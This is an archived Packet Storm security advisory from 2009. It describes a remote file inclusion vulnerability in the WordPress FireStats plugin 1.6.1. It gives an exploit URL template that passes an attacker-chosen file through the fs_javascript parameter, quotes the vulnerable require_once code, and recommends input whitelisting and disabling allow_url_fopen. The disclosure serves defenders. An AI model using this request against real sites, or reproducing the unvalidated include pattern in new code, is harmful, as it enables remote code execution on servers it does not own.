exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress FireStats 1.6.1 Remote File Inclusion

WordPress FireStats 1.6.1 Remote File Inclusion
Posted Jun 14, 2009
Authored by darkmasking

The WordPress FireStats plugin versions 1.6.1 and below suffer from a remote file inclusion vulnerability.

tags | exploit, remote, code execution, file inclusion
SHA-256 | 5023bfef7b22c65f3d557e4e4e0c48b5770cdec9ab8363ec202cd1b05778bfcc

WordPress FireStats 1.6.1 Remote File Inclusion

Change Mirror Download
[»]===============================================================================================================[_][-][X]
[»] [»]
[»] WordPress Plugin FireStats <= 1.6.1-stable (fs_javascript) RFI Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=====================================================================================================================[»]
[»] Author : darkmasking [»]
[»] Date : June, 13th 2009 [»]
[»] Contact : darkmasking[at]gmail.com [»]
[»] Critical Level : Dangerous *red* [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : FireStats Version 1.6.1-stable [FireStats is a web statistics system] [»]
[»] Vendor : http://firestats.cc/ [»]
[»] Price : $25.00 ( commercial usage ) [»]
[»]=====================================================================================================================[»]
[»] [»]
[»] [~] RFI : [»]
[»] [»]
[»] http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de] [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Vuln : firestats-wordpress.php :Line 36 [»]
[»] [»]
[»] $path = fs_get_firestats_path(); [»]
[»] $file = $_GET['fs_javascript']; [»]
[»] unset($_GET['fs_javascript']); [»]
[»] if (strpos($file,"..") !== false) die(".. is not allowed in fs_javascript"); [»]
[»] require_once("$path/$file"); [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Vulnerability description : [»]
[»] [»]
[»] This script is possibly vulnerable to file inclusion attacks. [»]
[»] [»]
[»] It seems that this script includes a file which name is determined using user-supplied data. [»]
[»] This data is not properly validated before being passed to the include function. [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability : [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where is possible, [»]
[»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen would normally allow a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option from php.ini. [»]
[»] [»]
[»]---------------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz : [»]
[»] [»]
[»] Sorry bro lom ada teman jadi tuk diri sendiri aja! [»]
[»] [»]
[»] [»]
[»]=====================================================================================================================[»]


Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close